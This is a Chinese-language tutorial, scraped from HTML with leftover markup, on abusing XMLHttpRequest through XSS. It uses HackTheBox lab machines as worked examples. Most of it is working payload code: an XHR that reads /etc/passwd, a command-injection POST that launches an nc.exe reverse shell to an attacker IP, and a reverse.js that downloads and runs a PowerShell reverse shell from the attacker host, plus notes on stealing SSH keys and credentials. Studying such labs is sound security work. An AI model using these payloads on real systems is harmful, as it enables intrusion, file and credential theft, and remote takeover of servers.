XMLHttpRequest (XHR) 安全利用技术详解<\/h1>

0x01 XHR 基础概念<\/h2>

XMLHttpRequest (XHR) 是现代浏览器内置对象，用于与服务器交互而无需刷新整个页面。关键特性：<\/p>

支持获取任何类型数据，不限于 XML<\/li>
支持 HTTP 以外的协议（包括 file:\/\/ 和 FTP）<\/li>

常用于 AJAX 编程中实现异步数据加载<\/li> <\/ul>

0x02 利用一：读取本地文件<\/h2>

应用场景<\/h3>

XSS 攻击后台管理员<\/li>
普通用户构造 payload 发送给管理员<\/li>

管理员登录后台触发 payload<\/li> <\/ul>

实例分析（HackTheBox book 靶场）<\/h3>

环境描述<\/strong>：<\/p>

普通用户可上传 PDF 并自定义 Title 和 Author<\/li>
管理员可下载用户上传的 PDF<\/li>
Title 字段 XSS 会显示在管理员可见的 PDF 标题中<\/li> <\/ul> <\/li>

验证步骤<\/strong>：<\/p>
<script<\/span>>document.write<\/span>(Date());<\/script<\/span>> <\/span><\/span><\/code><\/pre><\/li> 利用 XHR 读取本地文件<\/strong>：<\/p> <script<\/span>> <\/span><\/span> x<\/span> =<\/span> new<\/span> XMLHttpRequest<\/span>; <\/span><\/span> x<\/span>.onload<\/span> =<\/span> function<\/span>(){ <\/span><\/span> document.write<\/span>(this<\/span>.responseText<\/span>) <\/span><\/span> }; <\/span><\/span> x<\/span>.open<\/span>("GET"<\/span>, "file:\/\/\/etc\/passwd"<\/span>); <\/span><\/span> x<\/span>.send<\/span>(); <\/span><\/span><\/script<\/span>> <\/span><\/span><\/code><\/pre><\/li> 进阶利用<\/strong>：<\/p> 读取服务器 SSH 私钥实现登录<\/li> 注意：有字数限制时可写入外部 JS 文件引用<\/li> <\/ul> <\/li> <\/ol> 0x03 利用二：XSS 到 SSRF 实现命令执行<\/h2> 应用场景<\/h3> 存在命令执行功能但限制 IP 访问<\/li> 需要借用管理员身份绕过 IP 限制<\/li> <\/ul> 实例分析（HackTheBox Bankrobber 靶场）<\/h3> 环境描述<\/strong>：<\/p> backdoorchecker.php 可执行 dir 命令<\/li> 仅允许本地执行<\/li> 通过 SQL 注入已获取源码<\/li> <\/ul> <\/li> 利用思路<\/strong>：<\/p> 结合 XHR 借用管理员身份访问 backdoorchecker.php<\/li> 构造 payload 绕过命令执行限制<\/li> <\/ul> <\/li> Payload 示例<\/strong>：<\/p> <script<\/span>> <\/span><\/span> var<\/span> x<\/span> =<\/span> new<\/span> XMLHttpRequest<\/span>(); <\/span><\/span> x<\/span>.open<\/span>("POST"<\/span>, "backdoorchecker.php"<\/span>, true<\/span>); <\/span><\/span> x<\/span>.setRequestHeader<\/span>("Content-type"<\/span>, "application\/x-www-form-urlencoded"<\/span>); <\/span><\/span> x<\/span>.send<\/span>('cmd=dir xxx || \\\\10.10.16.21\\ica\\nc.exe -e cmd.exe 10.10.16.21 9999'<\/span>); <\/span><\/span><\/script<\/span>> <\/span><\/span><\/code><\/pre><\/li> 反弹 Shell<\/strong>：<\/p> 攻击机监听：nc -lvvp 9999<\/code><\/li> 使用 SMB 服务（可通过 impacket 的 smbserver.py 搭建）<\/li> <\/ul> <\/li> <\/ol> 0x04 扩展利用技术<\/h2> 外部 JS 文件引用<\/h3> 基本方法<\/strong>：<\/p> <script<\/span> src<\/span>=<\/span>"http:\/\/攻击IP:8000\/reverse.js"<\/span>><\/script<\/span>> <\/span><\/span><\/code><\/pre><\/li> reverse.js 示例<\/strong>：<\/p> function<\/span> paintfunc<\/span>(){ <\/span><\/span> var<\/span> http<\/span> =<\/span> new<\/span> XMLHttpRequest<\/span>(); <\/span><\/span> var<\/span> url<\/span> =<\/span> 'http:\/\/localhost\/admin\/backdoorchecker.php'<\/span>; <\/span><\/span> var<\/span> params<\/span> =<\/span> 'cmd=dir| powershell -c "iex (New-Object Net.WebClient).DownloadString(\'http:\/\/10.10.16.21:8000\/Invoke-PowerShellTcp.ps1\');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.21 -Port 9969"'<\/span>; <\/span><\/span> http<\/span>.open<\/span>('POST'<\/span>, url<\/span>, true<\/span>); <\/span><\/span> http<\/span>.setRequestHeader<\/span>('Content-type'<\/span>, 'application\/x-www-form-urlencoded'<\/span>); <\/span><\/span> http<\/span>.send<\/span>(params<\/span>); <\/span><\/span>} <\/span><\/span>paintfunc<\/span>(); <\/span><\/span><\/code><\/pre><\/li> <\/ol> PowerShell 反弹 Shell<\/h3> 使用 PowerShell 下载并执行脚本<\/li> 需要预先准备 Invoke-PowerShellTcp.ps1<\/li> <\/ul> 0x05 注意事项与问题解决<\/h2> 常见问题<\/strong>：<\/p> Chrome + Windows 环境下可能无法读取其他目录文件<\/li> 错误信息：Uncaught DOMException: Failed to execute 'send' on 'XMLHttpRequest'<\/code><\/li> <\/ul> <\/li> 解决方案<\/strong>：<\/p> 参考 CVE-2019-11730（Firefox 特定版本漏洞）<\/li> 下载指定版本 Firefox：http:\/\/ftp.mozilla.org\/pub\/firefox\/releases\/<\/li> 必须将文件保存到本地再打开<\/li> <\/ul> <\/li> iframe 限制<\/strong>：<\/p> iframe 通过浏览器本地同源加载文件，不能通过网络加载<\/li> 本地测试有效，但通过网站访问时受限<\/li> <\/ul> <\/li> <\/ol> 0x06 其他潜在利用方式<\/h2> 未登录后台情况<\/strong>：<\/p> 添加管理员账户<\/li> 修改系统配置<\/li> <\/ul> <\/li> 数据外泄<\/strong>：<\/p> 窃取敏感信息<\/li> 获取用户凭证<\/li> <\/ul> <\/li> <\/ol> 参考资源<\/h2> XML HttpRequest 教程 - W3Schools<\/a><\/li> XSS 发送外域请求 - heartsky<\/a><\/li> XSS 数据渗出技术 - 0daylabs<\/a><\/li> <\/ol>